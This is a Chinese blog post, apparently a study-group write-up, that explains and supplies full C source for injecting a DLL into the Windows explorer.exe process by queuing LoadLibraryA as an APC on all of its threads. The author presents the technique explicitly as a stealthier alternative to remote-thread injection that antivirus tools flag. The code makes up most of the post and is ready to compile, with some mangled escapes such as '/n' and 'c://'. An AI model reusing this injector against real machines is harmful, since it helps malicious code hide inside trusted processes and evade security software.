Use APC to inject explorer

最新推荐文章于 2022-08-02 15:20:01 发布
最新推荐文章于 2022-08-02 15:20:01 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: Windows 文章标签: null thread windows function access callback

 上周五去蹭我们组的Windows Internal Study Group的lesson,这是Trend的一大特色,提倡share。虽然本次课听懂的不多(可以说几乎都没有听懂),倒是开阔了眼界。尤其这周一晚上听AU的Head First Struy Group,课后体会是“写程序还有这么多讲究,这么生动,设计的很巧妙”,是提升程序员自身修养的一门课。Windows Internal 的课堂作业(我抄rick的),课后实验,我在网上找资料没找到,还是rick share了他的成果,拿来发帖了!

http://hi.baidu.com/combojiang/blog/item/ac3a22194dfd637cdbb4bd3c.html

关于APC概念方面的介绍,前面已经有专文详细的说明了,在这里不再重复了。本篇我们主要谈谈利
用APC实现向一个运行中的进程注入自己的代码的用法。

向一个运行中的进程注入自己的代码,常见的办法有全局钩子,以及CreateRemoteThread实现的远
程线程注入,如今远线程注入已经是泛滥成灾,杀毒软件对于远程线程已经做了检查和警示。

用户态代码想要更隐蔽地藏身于别的进程,就应该在注入的环节隐蔽自己的行为。本篇给出的示例
为在Explorer里加载自己的dll。 

这里首先提到的就是一个API:QueueUserAPC 。原型如下: 

DWORD QueueUserAPC( 
PAPCFUNC pfnAPC, // APC function 
HANDLE hThread,  // handle to thread 
ULONG_PTR dwData // APC function parameter 

从流程上看QueueUserAPC直接转入了系统服务NtQueueApcThread从而利用KeInsertQueueApc向给出
的目标线程的 APC队列插入一APC对象。倘若KiDeliverApc顺利的去构造apc环境并执行我们的代码
那一切就OK了,只可惜没有那么顺利的事, ApcState中UserApcPending是否为TRUE有重要的影响,
结果往往是你等到花儿都谢了你的代码还是没得到执行。在核心态往往不成问 题,自己动手赋值,
可是用户态程序可不好做,怎么办?

实际上应用程序在请求“alertable”的等待时系统就会置UserApcPending为TRUE(当 
KeDelayExecutionThread/KeWaitForMultipleObjects/KeWaitForSingleObject 使用
TestForAlertPending时就有可能,此外还有KeTestAlertThread等,机会还是有的),最简单的例
子,目标线程调用 SleepEx(***, TRUE)后我们插入APC代码就会乖乖执行了。 

如果我们插入的目标线程也是本进程的话,我们就可以调用上面的函数让APC迅速执行,但是这里如
果我们要插入的是Explorer进程,最简单的办法就是枚举Explorer中所有线程,全数插入,相信这么
多的线程中,总有一个满足执行条件,只要有一个满足条件,我们就成功了。


代码:见光盘InsertApc,代码摘自网络,略作修改。

#define _WIN32_WINNT 0x0400
#define WIN32_LEAN_AND_MEAN   // 从 Windows 头中排除极少使用的资料

#include <windows.h>
#include <Tlhelp32.h>
#include <stdio.h>
#include <stdlib.h>

typedef HANDLE (CALLBACK *OPENTHREAD) (DWORD dwFlag, BOOL bUnknow, DWORD dwThreadId); 


typedef struct _TIDLIST 
{
    DWORD dwTid ;
    _TIDLIST *pNext ;
}TIDLIST;

DWORD EnumThread(HANDLE hProcess, TIDLIST *pThreadIdList)
{
    TIDLIST *pCurrentTid = pThreadIdList ;
    HANDLE hThread;
    const char szInjectModName[] = "c://sysnap.dll" ;
    DWORD dwLen = strlen(szInjectModName) ;
    HMODULE hDll = GetModuleHandle("Kernel32.dll"); 

    PVOID param = VirtualAllocEx(hProcess, /
            NULL, dwLen, MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE) ;


    if (param != NULL)
    {
       DWORD dwRet ;
       if (WriteProcessMemory(hProcess, param, (LPVOID)szInjectModName, dwLen, &dwRet))
       {
            while (pCurrentTid)
            {
                OPENTHREAD lpfnOpenThread = (OPENTHREAD)::GetProcAddress(hDll, "OpenThread"); 
                hThread = lpfnOpenThread(THREAD_ALL_ACCESS,FALSE,pCurrentTid->dwTid);
                if (hThread != NULL)
                {
                    //
                    // 注入DLL到指定进程
                    //
                    QueueUserAPC((PAPCFUNC)LoadLibraryA, hThread, (ULONG_PTR)param) ;
                }

                printf("TID:%d/n", pCurrentTid->dwTid) ;
                pCurrentTid = pCurrentTid->pNext ;
            }
       }
    }
    return 0 ;
}

DWORD GetProcID(const char *szProcessName)
{
    PROCESSENTRY32 pe32 = {0} ;
    pe32.dwSize = sizeof(PROCESSENTRY32);

    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) ;

    if (hSnapshot == INVALID_HANDLE_VALUE)
    {
       return 0xFFFFFFFF ;
    }

    if (!Process32First(hSnapshot, &pe32))
    {
       return 0xFFFFFFFF ;
    }

    do 
    {
       if (!_strnicmp(szProcessName, pe32.szExeFile, strlen(szProcessName)))
       {
            printf("%s的PID是:%d/n", pe32.szExeFile, pe32.th32ProcessID);
            return pe32.th32ProcessID ;
       }
    } while(Process32Next(hSnapshot, &pe32));

    return 0xFFFFFFFF ;

}

TIDLIST* InsertTid(TIDLIST *pdwTidListHead, DWORD dwTid)
{
    TIDLIST *pCurrent = NULL ;
    TIDLIST *pNewMember = NULL ;

    if (pdwTidListHead == NULL)
    {
       return NULL ;
    }
    pCurrent = pdwTidListHead ;

    while (pCurrent != NULL)
    {

       if (pCurrent->pNext == NULL)
       {
            //
            // 定位到链表最后一个元素
            //
            pNewMember = (TIDLIST *)malloc(sizeof(TIDLIST)) ;

            if (pNewMember != NULL)
            {
                pNewMember->dwTid = dwTid ;
                pNewMember->pNext = NULL ;
                pCurrent->pNext = pNewMember ;
                return pNewMember ;
            }
            else
            {
                return NULL ;
            }
       }
       pCurrent = pCurrent->pNext ;
    }

    return NULL ;
}

int EnumThreadID(DWORD dwPID, TIDLIST *pdwTidList)
{
    int i = 0 ;

    THREADENTRY32 te32 = {0} ;
    te32.dwSize= sizeof(THREADENTRY32) ;

    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,dwPID) ;

    if(hSnapshot != INVALID_HANDLE_VALUE)
    {
       if(Thread32First(hSnapshot,&te32)) 
       {
            do
            {
                if(te32.th32OwnerProcessID==dwPID) 
                {
                    if (pdwTidList->dwTid == 0)
                    {
                           pdwTidList->dwTid = te32.th32ThreadID ;
                    }
                    else
                    {
                           if (NULL == InsertTid(pdwTidList, te32.th32ThreadID))
                           {
                                printf("插入失败!/n") ;
                                return 0 ;
                           }
                    }     
                } 
            }while(Thread32Next(hSnapshot,&te32));
       }
    }
    return 1 ;
}

void RemoveTid(TIDLIST *pdwTidListHead)
{
    TIDLIST *pCurrent = NULL ;
    TIDLIST *pNext = NULL ;


    if (pdwTidListHead == NULL)
    {
       return;
    }
    pCurrent = pdwTidListHead ;

    while (pCurrent != NULL)
    {
     
       pNext = pCurrent->pNext;
       free(pCurrent);
       pCurrent = pNext;
    }

}
int main(int argc, char* argv[])
{
    TIDLIST *pTidHead = (TIDLIST *)malloc(sizeof(TIDLIST)) ;

    if (pTidHead == NULL)
    {
       return 1 ;
    }
    RtlZeroMemory(pTidHead, sizeof(TIDLIST)) ;

    DWORD dwPID = 0 ;

    if ((dwPID = GetProcID("explorer.exe")) == 0xFFFFFFFF)
    {
       printf("进程ID获取失败!/n") ;
       return 1 ;
    }

    //
    // 枚举线程ID
    //
    EnumThreadID(dwPID, pTidHead) ;

    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID) ;

    if (hProcess == NULL)
    {
       return 1 ;
    }
    EnumThread(hProcess, pTidHead) ;

    CloseHandle(hProcess);

    RemoveTid(pTidHead);

    return 0;
}

分析:

代码比较简单,步骤如下:
1)根据进程名,获取进程ID,通过遍历所有的进程,比较当前遍历到的进程名是否等于我们参数传
递进的进程名,如果是,则返回此进程的ID,否则继续遍历。

2)根据获取的进程ID,打开目标进程。

3)遍历进程内所有的线程模块,将遍历出的线程ID,保存到一个单项链表中。

4)调用QueueUserAPC向链表中的每个线程插入APC。

5)关闭进程句柄。

6)删除链表。
snlying
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
32,64位下的Ring3层的动态库dll注入
11-22
自己写的一个进程,将对方的进程空间打开,在其中写ShellCode,这句shellcode翻译为机器指令实际上就是loadlibrary(Dll.dll),也就是自己写的一个动态库,在这个动态库中这写了当有进程加载此动态库时弹出一个MessageBox
进程注入系列一之APC注入
weixin_46539164的博客
04-28 3496
什么是APC APC 是一个简称,全称为Asynchronous Procedure Call,叫异步过程调用,是指函数在特定线程中被异步执行,在操作系统中,APC是一种并发机制。 MSDN解释为: 相关函数 QueueUserApc:函数作用,添加制定的异步函数调用(回调函数)到执行的线程的APC队列中 APCproc:函数作用: 回调函数的写法. 核心函数 QueueUserAPC DWORD QueueUserAPC( PAPCFUNCpfnAPC, // APC function HANDLEhT
APC注入以及几种实现方式
include_voidmain的博客
08-02 2050
APC注入以及几种实现方式
暴力注入Explorerapc方法
07-17 1204
 向一个运行中的进程注入自己的代码,最自然莫过于使用CreateRemoteThread,如今远线程注入已经是泛滥成灾,同样的监测远线程注入、防止远线程注入的工具也举不胜举,一个木马或后门启动时向Explorer或IE的注入操作就像在自己脸上写上“我是贼”一样。用户态代码想要更隐蔽地藏身于别的进程,就应该在注入的环节隐蔽自己的行为。下面就介绍一种非常简单不过比较暴力的方法,给出的示例为在E
通过异步过程调用(APC)注入DLL
07-02 688
关于APC的介绍,可以参考MSDN对Asynchronous Procedure Calls的介绍(索引APCs),下面是简单翻译的一段文字。 APC(Asynchronous Procedure Calls,异步过程调用)是指在一个特定的线程环境中异步的执行代码。当一个APC被添加到一个线程的APC队列的时候,系统会产生一个软中断;当线程下一次被调度的时候APC函数将被执行。操作系统产生的AP
apc_inject.rar_APC_APC inject_inject
09-23
标题 "apc_inject.rar_APC_APC inject_inject" 提到的是一个关于APC(Asynchronous Procedure Call)注入技术的文件包。APC注入通常指的是在用户模式进程中注入shellcode,通过Ring 0级别的权限执行,这涉及到操作...
apc_inject.zip_APC_APC inject_inject_inject apc_inject code
09-24
标题 "apc_inject.zip_APC_APC inject_inject_inject apc_inject code" 提及的核心技术是“APC(Asynchronous Procedure Call)注入”,这通常与恶意软件或安全研究相关,特别是针对Windows操作系统的攻击手段。...
APC_inject.zip_APC_APC_inject_driver user apc_inject driver_inje
09-14
标题 "APC_inject.zip_APC_APC_inject_driver user apc_inject driver_inje" 暗示了我们正在讨论一个与Windows操作系统内核相关的技术,特别是涉及到APC(Asynchronous Procedure Call)注入和驱动程序开发。APC注入...
exe将dll注入到explorer.exe资源管理器进程_DLL注入示例.injectdll
03-28
在本示例中,“exe将dll注入到explorer.exe资源管理器进程_DLL注入示例”是一个具体的操作实例,它演示了如何将DLL注入到Windows资源管理器进程(explorer.exe)中。 首先,我们需要理解DLL是什么。DLL(Dynamic ...
QueueUserApc实现DLL注入的测试
Lassewang的成长历程
05-03 1402
Code highlighting produced by Actipro CodeHighlighter (freeware)http://www.CodeHighlighter.com/-->#include "stdafx.h" #define _WIN32_WINNT 0x0400 #define WIN32_LEAN_AND_MEAN // 从 Windows 头中排除极少使用的资料
漫谈兼容内核之十二:WindowsAPC机制
周寅的专栏
03-13 3069
  前两篇漫谈中讲到,除ntdll.dll外,在启动一个新进程运行时,PE格式DLL映像的装入和动态连接是由ntdll.dll中的函数LdrInitializeThunk()作为APC函数执行而完成的。这就牵涉到了WindowsAPC机制,APC是“异步过程调用(Asyncroneus Procedure Call)”的缩写。从大体上说,WindowsAPC机制相当于Linux的Signal机
内核模式 注入DLL
sgzwiz的专栏
03-03 3469
//用APC实现在内核模式运行用户程序 //昨天晚上弄到1点,总算把这个东西调通了,这个是老技术了,在rootkit上又篇文章讨论过,参考那篇文章我把这个东西弄出来了.代码贴在下面灌水,高手就不用看了...... //=====================================================================================// //N
第五章 进程注入之APC注入(附源码)
test\\的博客
12-01 1759
目录前言函数介绍QueueUserAPC函数语法参数返回值示例程序代码DLL代码测试原理学习 前言 APC注入可以让一个线程在它正常的执行路径运行之前执行一些其他的代码,每一个线程都有一个附加的APC队列,他们在线程处于可警告的时候才被处理;如果程序在线程可警告等待状态时候排入一个APC队列,那么线程将开始执行APC函数,恶意代码则可以设置APC函数抢占可警告等待状态的线程。 函数介绍 QueueUserAPC函数 把一个APC对象加入到指定线程的APC队列中。
APC实现DLL注入
十年磨一剑,霜刃未曾试!
01-19 2547
#include #include int InjectDllWithApc(char DllFullPath[MAX_PATH], ULONG pid ) { HANDLE hProcess,hThread,hThreadSnap = INVALID_HANDLE_VALUE; THREADENTRY32 te32 = {0} ; HMODULE hDll = GetM
进程注入DLL实现(APC和远程线程创建)
chenxiangyangxy的专栏
11-30 1026
///有些情况下,我们需要在整个系统下做事情,这个时候,远程注入DLL是需要的。例如,我想做输入法、游戏 ///外挂、API Hook呀,等等。 ///一般情况下,远程注入DLL方式有:windows Hook、创建远程线程、使用APC技术、内核修改进程启动过程 ///或者内核加载映像时修改PE导入表。这些过程中涉及内核的技术含量最高,也比较难。不涉及内核的老被杀 ///毒软件报毒。而除了
进行DLL注入的三种方法
热门推荐
神经网络爱好者
05-19 1万+
进行DLL注入的三种方法
驱动里执行应用层代码之KeUserModeCallBack,支持64位win7(包括WOW64)
fanxiushu的专栏
07-26 1万+
by Fanxiushu            2014-07-26 在驱动层(ring0)里执行应用层(ring3)代码,这是个老生常谈的技术,而且方法也挺多。 这种技术的本质:其实就是想方设法在驱动层里把应用层代码弄到应用层去执行。 比如在APC异步调用中,KeInsertQueueApc,KeInitializeApc等函数中可设置一个在ring3层执行一个回调函数,这样就可以
APC注入
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
10-30 618
/*********************************** desc : This code was written for inject a dll named text.dll to the target process based on APC. time : 2013 coder: ejoywx **********************
use mockito to write Kafka producer unit test.
最新发布
05-19
We use Mockito to mock the Kafka producer and inject it into the `KafkaService`, and then we use the `when` method to specify the behavior of the `createProducer` method. In the test method, we call...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值